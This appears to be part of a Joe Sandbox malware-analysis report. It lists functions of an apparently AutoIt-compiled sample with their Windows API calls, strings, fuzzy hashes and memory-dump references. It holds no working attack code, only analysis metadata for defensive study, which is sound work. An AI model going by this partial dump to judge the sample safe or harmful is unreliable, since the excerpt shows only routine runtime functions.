Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7e48d249c5f6adfa48dd5dd509ad85ddc703ea426d83b8a7fd7c2311fe3087b7
Instruction ID: 760ccf41337c8c0b817cac90606ca2c3b06b1ae015fd01ae80b12620956b81da
Opcode Fuzzy Hash: 7e48d249c5f6adfa48dd5dd509ad85ddc703ea426d83b8a7fd7c2311fe3087b7
Instruction Fuzzy Hash: 3F019072810B16AFC730AF66DCC0416F7F5BF503163158A7ED19652931C371A968CE84

Function 001E3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B83

Strings

Control Panel\Mouse, xrefs: 001E3B3E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 8bb8bc68d67f69abd5c0d97f9408154b868026a1f04b4b492a7188fbca964e8d
Instruction ID: ed7f48f8de5b380796fae3cc3a26e4285a5417be473d37cb5a6c69117c5fdfcb
Opcode Fuzzy Hash: 8bb8bc68d67f69abd5c0d97f9408154b868026a1f04b4b492a7188fbca964e8d
Instruction Fuzzy Hash: 5A112AB5510648FFDB218FA6DC48AAFB7B8EF44744B144559E816D7210D3319E4097A0

Function 001E3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002233A2

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E3A04

Strings

Line: , xrefs: 002233EB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 1ce3b57be5041a8d86d5162e2c2d06674fa8dd888aa761c618f60e2847feaaaf
Instruction ID: e701a13728f494e9079c011198ac6eb75f7fe937358e89390c2776417b92c806
Opcode Fuzzy Hash: 1ce3b57be5041a8d86d5162e2c2d06674fa8dd888aa761c618f60e2847feaaaf
Instruction Fuzzy Hash: 7A310271408780AAC324EB21EC49BEFB3D8AF50310F50066AF5A983091EB709A58C7C2

Function 001E2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00222C8C

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

Part of subcall function 001E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001E2DC4

Strings

X, xrefs: 00222C5A
`e*, xrefs: 00222C85

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e*
API String ID: 779396738-1794627178
Opcode ID: 2d6a448740cceaa7948d17095770de3cd0df32bcc83ff3073b97e8c73f9ce8c0
Instruction ID: 2ae9c4aa14a8b0d81faa5a8743adb6b32ae0ca0e31db1468ee8acd0d41e0617c
Opcode Fuzzy Hash: 2d6a448740cceaa7948d17095770de3cd0df32bcc83ff3073b97e8c73f9ce8c0
Instruction Fuzzy Hash: 2321D570A10298AFCB01DF95D809BEE7BFCAF59304F04405AE515B7241DBB45A998FA1

Function 001FFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00200668

Part of subcall function 002032A4: RaiseException.KERNEL32(?,?,?,0020068A,75912E40,?,?,?,?,?,?,?,0020068A,?,002A8738), ref: 00203304

__CxxThrowException@8.LIBVCRUNTIME ref: 00200685

Strings

Unknown exception, xrefs: 00200692

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 51642517bfb61346e03da3dd89ea3ddaa92573d3e2b0ac631c6c7beddf3aa3b6
Instruction ID: ea3e6aba5d9e219bbb2e7aeee471fce2015e96d5152dd06e34e01b60007f3185
Opcode Fuzzy Hash: 51642517bfb61346e03da3dd89ea3ddaa92573d3e2b0ac631c6c7beddf3aa3b6
Instruction Fuzzy Hash: 11F0223492030D7BDB00BAA4DC86EAE7B6D6E01310F604135FA14825D3EFB2EA36CD80

Function 001E10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1BF4
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001E1BFC
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E1C07
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E1C12
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001E1C1A
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001E1C22

Part of subcall function 001E1B4A: RegisterWindowMessageW.USER32(00000004,?,001E12C4), ref: 001E1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001E136A
OleInitialize.OLE32 ref: 001E1388
CloseHandle.KERNEL32(00000000,00000000), ref: 002224AB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 8d46c84c2f9300299f898f5394f9f0e319473c0978bacd41f8633d012e24e874
Instruction ID: c342acb58dc9d9d0b5bc74cd97f62c9c9e2b805757f8252ad56e75b8791a1ce9
Opcode Fuzzy Hash: 8d46c84c2f9300299f898f5394f9f0e319473c0978bacd41f8633d012e24e874
Instruction Fuzzy Hash: B7719DB49216408ED3A4DF7ABC6D6A93BE4FB983843E4832ED50AC7261EB305475CF51

Function 0024C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0024C259
KillTimer.USER32(?,00000001,?,?), ref: 0024C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0024C270

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 25d2c4ca5ea36d81c1f28aba061d975ee97c8db2967c8fed94b44eb09ca7ead1
Instruction ID: afbf88e16003e0680c80cf692d533557f165a5702745c0514e46042af3277130
Opcode Fuzzy Hash: 25d2c4ca5ea36d81c1f28aba061d975ee97c8db2967c8fed94b44eb09ca7ead1
Instruction Fuzzy Hash: A131E570915344AFEB66CF789859BE7BBECAB02308F10009ED6DEA3241C7F45A84CB51

Function 002186AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,002185CC,?,002A8CC8,0000000C), ref: 00218704
GetLastError.KERNEL32(?,002185CC,?,002A8CC8,0000000C), ref: 0021870E
__dosmaperr.LIBCMT ref: 00218739

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: b8f4a94216b413673609c00bdfd8b3a9cacd0fdac31106591755b9af3e92e7ae
Instruction ID: 1790c2930664d18586f9e3fb93540f1c5ef6fd7e00972f67640cd9febdef0d3e
Opcode Fuzzy Hash: b8f4a94216b413673609c00bdfd8b3a9cacd0fdac31106591755b9af3e92e7ae
Instruction Fuzzy Hash: 91016B32A342B456D260663468C97FE67CD4BF1774F38029AF8188B1D2DEA0CCD28550

Function 001EDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 001EDB7B
DispatchMessageW.USER32(?), ref: 001EDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB9F
Sleep.KERNELBASE(0000000A), ref: 001EDBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00231CC9

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 7d7e0cc5a72e3956a15ca166e84b622f1196e464b32a09fe3679e8fc45b95384
Instruction ID: 464fd1aba7fa6f0ab823f12abc25ac61ae1501ed1844f12fc9778af03da58556
Opcode Fuzzy Hash: 7d7e0cc5a72e3956a15ca166e84b622f1196e464b32a09fe3679e8fc45b95384
Instruction Fuzzy Hash: 9FF05E306043819BE734CBB1EC99FEA73ACEB45310F604A19E60A830D0EB309498CB26

Function 00250371 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,0025015C,00000000,?,00000000,?,0022249E,00000000), ref: 00250387
GetCurrentProcess.KERNEL32(?,00000000,?,0025015C,00000000,?,00000000,?,0022249E,00000000), ref: 0025038F
DuplicateHandle.KERNELBASE(00000000,?,0025015C,00000000,?,00000000,?,0022249E,00000000), ref: 00250396

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 14cdde6407f6bd71a8a202636113f0e0057239983ca321ed9423d71898df9876
Instruction ID: 0e00de7ddbde025c8e349d9db2ccf20ac1debf645ea2a6d555c3be2b8836873d
Opcode Fuzzy Hash: 14cdde6407f6bd71a8a202636113f0e0057239983ca321ed9423d71898df9876
Instruction Fuzzy Hash: 86D01276154305BBC7012B65AC4EF367A3CFB95F22F20406DFA0D991518A7054515624

Function 001F1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001F17F6

Strings

CALL, xrefs: 001F17C6

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: adba8810cf895a11cf13b48992d99aedeae3f8a171472ac0801336bf769d98c4
Instruction ID: ad8118f0d504e2c847239998ef359e4569f0ede00a46bcb7463b9690b5e4547a
Opcode Fuzzy Hash: adba8810cf895a11cf13b48992d99aedeae3f8a171472ac0801336bf769d98c4
Instruction Fuzzy Hash: A522ABB0608305EFC714DF14C494A3ABBF5BF99314F24896DF68A8B262D771E855CB82

Function 001E3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3908

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 40f3546d6cfe516a504e41ddd7c7588deb7737c2face32758a548a3372623292
Instruction ID: 69a6935c9f8c9d37771731ec41f94d9b1981e489a64eab6d59e4472d0ce186b4
Opcode Fuzzy Hash: 40f3546d6cfe516a504e41ddd7c7588deb7737c2face32758a548a3372623292
Instruction Fuzzy Hash: 4531D570504741DFD320DF25E898B9BBBF4FB49708F000A6EF6A983240E771AA54CB52

Function 0025011D Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,0022249E,00000000), ref: 00250145
InterlockedExchange.KERNEL32(00000038,00000000), ref: 00250167

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 02f2369ca9848f17a017e146059ca72863087a88febc6ef1ab880a5f95f5bb1e
Instruction ID: deaf2231b0097bc8330885473f0fa74ef2649cc95bd89cab099b5530b00b57ec
Opcode Fuzzy Hash: 02f2369ca9848f17a017e146059ca72863087a88febc6ef1ab880a5f95f5bb1e
Instruction Fuzzy Hash: 99F03AB15017059FC3209F5AD948867FBFCFF95710B40882EE98A83A20C7B4B445CF90

Function 001FF645 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 001FF661

Part of subcall function 001ED730: GetInputState.USER32 ref: 001ED807

Sleep.KERNEL32(00000000), ref: 0023F2DE

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: InputSleepStateTimetime
String ID:
API String ID: 4149333218-0
Opcode ID: 6e8c052f7ea49a6c5bb57ec3288e0b07bbdceb2d571c30edf8eeef635c139f60
Instruction ID: b02bf553b29c41c18c7cb1915eeb45f45086c1a7d442326966e2890fee9e4b65
Opcode Fuzzy Hash: 6e8c052f7ea49a6c5bb57ec3288e0b07bbdceb2d571c30edf8eeef635c139f60
Instruction Fuzzy Hash: 9FF08C312446059FD314EF7AE449B6AB7E8EF55760F00002EE95EC7360DB70A840CB90

Function 002584DF Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00258564

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FullNamePathPrivateProfileString
String ID:
API String ID: 1991638491-0
Opcode ID: 1daca1b849233c8cff6a749941095020a1ca0c2afc88c6db1c980af50c499d84
Instruction ID: fd3b8beeac7846e4d377cb6a340c81c1d655800e2717132ecf91ca6a63e10a5e
Opcode Fuzzy Hash: 1daca1b849233c8cff6a749941095020a1ca0c2afc88c6db1c980af50c499d84
Instruction Fuzzy Hash: 13215139600A05AFCB10EB55E846CAEB7B5FF59710B014454FA496B3A2DB30FE51CBD0

Function 001E4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E9C
Part of subcall function 001E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001E4EAE
Part of subcall function 001E4E90: FreeLibrary.KERNEL32(00000000,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EFD

Part of subcall function 001E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E62
Part of subcall function 001E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001E4E74
Part of subcall function 001E4E59: FreeLibrary.KERNEL32(00000000,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E87

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 63f6c76f2a5f6871920b805d5bff87063f46984b0abd91cb852b8c8497d24c5f
Instruction ID: 15da10a227ebfa05d0a473c55b430ac19d8833c6ed82d68845b34914487b617a
Opcode Fuzzy Hash: 63f6c76f2a5f6871920b805d5bff87063f46984b0abd91cb852b8c8497d24c5f
Instruction Fuzzy Hash: 05113A32610705ABCF14FF75DC02FAD77A5AF50B10F20842DF542A61C1EF749A549B50

Function 00218402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00218440

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 1b951e41e1d50f6706e7a9bdc7924c13b4365b38c684e58232e4436514367d73
Instruction ID: 108371e0e15755ae28c3b9ae956307ff798de3ab788850209f75207afdd94cd0
Opcode Fuzzy Hash: 1b951e41e1d50f6706e7a9bdc7924c13b4365b38c684e58232e4436514367d73
Instruction Fuzzy Hash: EA11187590410AAFCB15DF58E9819DA7BF5EF49314F104069F809AB312DA31EA21CBA5

Function 00215000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00214C7D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00212E29,00000001,00000364,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00214CBE

_free.LIBCMT ref: 0021506C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
